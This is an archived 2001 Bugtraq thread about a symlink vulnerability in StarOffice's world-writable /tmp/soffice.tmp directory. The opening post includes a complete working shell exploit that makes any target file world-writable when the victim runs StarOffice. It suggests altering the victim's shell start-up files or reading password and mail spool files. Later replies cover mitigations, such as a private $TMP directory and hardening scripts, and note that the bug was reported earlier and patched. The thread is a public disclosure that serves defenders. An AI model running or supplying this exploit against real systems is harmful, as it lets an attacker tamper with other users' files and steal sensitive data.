6115455 2001-02-17 16:57 +0100 /106 rader/ JeT Li <jet_li_man@YAHOO.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-20 00:08 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: jet_li_man@yahoo.com
Mottagare: Bugtraq (import) <15515>
Ärende: HeliSec: StarOffice symlink exploit
------------------------------------------------------------
From: JeT Li <jet_li_man@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01021717035200.05311@JeT-Li>
- = Helios Security and Administration = -
Hi everyone,
StarOffice creates a temporary directory in /tmp called
soffice.tmp, with permissions 0777. Into this directory other
temporary files are creates, with the format: svZZZZ.tmp, where ZZZZ
in a four or five digits number.
StarOffice not only create the /tmp/soffice.tmp directory
with permissions 0777, but also chmod() it sometimes when StarOffice
is runing afterwards. If any user create a symbolic link from
/tmp/soffice.tmp to any file owned by other user, when this last user
run StarOffice the target of the link will become 0777. So, if the
directory of the target file is accessible by the maliciosous user
that created the symlink, he can do whatever he wants with the
file. A few ways to exploit this is:
- to modify shell start-up files (as .profile, .bashrc,
.cshrc, etc.) to execute whatever the hackers wants next time victim
logs in.
- to gain access to private files with sensitive information,
as passwords files, mail spool files, etc.
- a lot of more evil acts.
StarOffice no give error message or such when it change the
permissions of the target file, so from the victim point of view: all
is going right ;-)
Requeriments:
- Access to the targe file directory needed.
- The target file must NOT be executable.
Fix:
One way to fix the problem is to create a directory inside
your home directory which is inaccessible to anyone but yourself
(permissions 700), called tmp. Then insert an entry in your login
start-up file to set the $TMP environment variable to $HOME/tmp, so
it will direct StarOffice to use your temporary directory, rather
than the system /tmp. Something like this (in bash):
[wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
(not permanent)
or modify the .bash_profile adding TMP=$HOME/tmp and
including this variable in the export.
Here is the xploit code, to make sure that this will work,
run first staroffice, so you will become owner of /tmp/soffice.tmp,
necessary to remove it and create the symlink.
#!/bin/sh
SOFFICE="/tmp/soffice.tmp"
TARGETFILE=$1
if [ $# != 1 ]; then
echo
echo " - = HeliSec - Helios Security and Administration = -"
echo "Usage : "
echo "./soffice.sh <file>"
echo "Set 0777 permissions to any file (access to the directory of the file needed)"
echo " JeT Li -The Wushu Master-"
exit
fi
if [ ! -f ${TARGETFILE} ]; then
echo "Target file must exist"
exit
fi
rm -rf ${SOFFICE}
ln -sn ${TARGETFILE} ${SOFFICE}
echo
echo "Symbolik link done ..."
echo
perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ?
print "StarOffice is running on this machine ... wait a minutes and
the permissions will have been set.\n" :
print "StarOffice is not running on this machine ...you may wait for
the signal (not recommended) or CTRL+C the program; when the user
run StarOffice the permissions will be set automaticly\n";'
while :
do
if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
echo
echo "Permissions set succesfully ... good luck ;-)"
echo
echo "- = HeliSec - Helios Security and Administration = -"
echo " JeT Li -The Wushu Master-"
exit
fi
done
Cheers,
JeT Li -The Wushu Master-
_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
(6115455) --------------------------------(Ombruten)
Kommentar i text 6119648 av Peter W <peterw@USA.NET>
Kommentar i text 6131430 av Christian <christian@IT.MURDOCH.EDU.AU>
6119648 2001-02-19 22:04 -0500 /47 rader/ Peter W <peterw@USA.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-20 21:14 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: peterw@USA.NET
Mottagare: Bugtraq (import) <15538>
Kommentar till text 6115455 av JeT Li <jet_li_man@YAHOO.COM>
Ärende: Re: HeliSec: StarOffice symlink exploit
------------------------------------------------------------
From: Peter W <peterw@USA.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010219220429.A5388@usa.net>
On Sat, Feb 17, 2001 at 04:57:23PM +0100, JeT Li wrote:
> One way to fix the problem is to create a directory inside your
> home directory which is inaccessible to anyone but yourself (permissions 700),
> called tmp. Then insert an entry in your login start-up file to set the $TMP
> environment variable to $HOME/tmp, so it will direct StarOffice to use your
> temporary directory, rather than the system /tmp. Something like this (in
> bash):
>
> [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
> (not permanent)
> or modify the .bash_profile adding TMP=$HOME/tmp and including this
> variable in the export.
BTW, I have some fairly sophisticated TMPDIR/TMP scripts in the CVS
repository for Bastille
(http://sourceforge.net/projects/bastille-linux) that folks might
find useful. The scripts allow you to put TMPDIR somewhere other than
$HOME (say, local /tmp if $HOME is on NFS), to keep track of TMPDIRs
on a host-by-host basis, to hide the number of files and last access
time of $TMPDIR, etc. There's also an ancillary script designed to
keep pruning tools like 'tmpwatch' (frequently found on Linux
systems) from removing $TMPDIR while you're logged in, and to warn
you via multiple channels if something is amiss with your temp dir.
Look for bastille-tmpdir.sh, bastille-tmpdir.csh, and
bastille-tmpdir-defense.sh (the anti-'tmpwatch' tool).
bastille-tmpdir.* go in /etc/profile.d where many systems will run
them at login time (via /etc/bashrc or /etc/csh.login scanning
/etc/profile.d) bastille-tmpdir-defense.sh goes in /etc. All three
should be mode 0755.
These apps will be optional in the soon-to-be-release Bastille 1.2.0
hardening tool for Red Hat and Mandrake Linux distributions. I've
only tested the scripts under Linux, but they should be fairly
portable. Your feedback would be most appreciated.
It's nice that apps let you pick your own preferred temp space ($HOME
in some cases is a poor choice), but it's a shame that some apps
*need* you to do so to behave safely. :-(
-Peter
(6119648) --------------------------------(Ombruten)
6131430 2001-02-22 11:50 +0800 /22 rader/ Christian <christian@IT.MURDOCH.EDU.AU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-23 13:31 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: christian@IT.MURDOCH.EDU.AU
Mottagare: Bugtraq (import) <15581>
Kommentar till text 6115455 av JeT Li <jet_li_man@YAHOO.COM>
Ärende: Re: HeliSec: StarOffice symlink exploit
------------------------------------------------------------
From: Christian <christian@IT.MURDOCH.EDU.AU>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010222115051.A8880@diffie.it.murdoch.edu.au>
On Sat, Feb 17, 2001 at 04:57:23PM +0100, JeT Li wrote:
> StarOffice creates a temporary directory in /tmp called soffice.tmp,
> with permissions 0777. Into this directory other temporary files are creates,
> with the format: svZZZZ.tmp, where ZZZZ in a four or five digits number.
<snip>
I reported this problem to BUGTRAQ on November 8, 2000. See
http://www.securityfocus.com/bid/1922 for more details. I believe
Sun has now released patches for this issue. It always helps to do a
search before reporting a "new" vulnerability. :-)
Regards,
Christian.
(6131430) --------------------------------(Ombruten)
Kommentar i text 6131488 av JeT Li <jet_li_man@YAHOO.COM>
Kommentar i text 6131563 av Kurt Seifried <bugtraq@SEIFRIED.ORG>
6131488 2001-02-21 19:59 +0100 /25 rader/ JeT Li <jet_li_man@YAHOO.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-23 13:34 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: jet_li_man@yahoo.com
Mottagare: Bugtraq (import) <15583>
Kommentar till text 6131430 av Christian <christian@IT.MURDOCH.EDU.AU>
Ärende: Re: HeliSec: StarOffice symlink exploit
------------------------------------------------------------
From: JeT Li <jet_li_man@YAHOO.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01022120233800.00939@JeT-Li>
> I reported this problem to BUGTRAQ on November 8, 2000. See
> http://www.securityfocus.com/bid/1922 for more details. I believe Sun
> has now released patches for this issue. It always helps to do a search
> before reporting a "new" vulnerability. :-)
>
> Regards,
>
> Christian.
Hi Christian, I had already saw your post when I sent the
mine ;-) I know that this vulnerability is not new, and I didn't say
that it was. I have included an exploit because there was none for
this flaw, and I have explained a little more how to fix the
problem. Thank u for the info, regards:
JeT Li -The Wushu Master-
_________________________________________________________
Do You Yahoo!?
Get your free @yahoo.com address at http://mail.yahoo.com
(6131488) --------------------------------(Ombruten)
6131563 2001-02-22 14:34 -0700 /17 rader/ Kurt Seifried <bugtraq@SEIFRIED.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-02-23 13:39 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: bugtraq@SEIFRIED.ORG
Mottagare: Bugtraq (import) <15594>
Kommentar till text 6131430 av Christian <christian@IT.MURDOCH.EDU.AU>
Ärende: Re: HeliSec: StarOffice symlink exploit
------------------------------------------------------------
From: Kurt Seifried <bugtraq@SEIFRIED.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <01ad01c09d17$36888860$3200030a@seifried.org>
> > StarOffice creates a temporary directory in /tmp called soffice.tmp,
> > with permissions 0777. Into this directory other temporary files are
creates,
> > with the format: svZZZZ.tmp, where ZZZZ in a four or five digits number.
Staroffice honors $TMP, so create /home/foo/tmp and set your TMP
variable. This is not a solution per se I know, but it does help (and
more and more apps are honoring the $TMP/$TMPDIR variable).
Kurt Seifried, seifried@securityportal.com
Securityportal - your focal point for security on the 'net
(6131563) --------------------------------(Ombruten)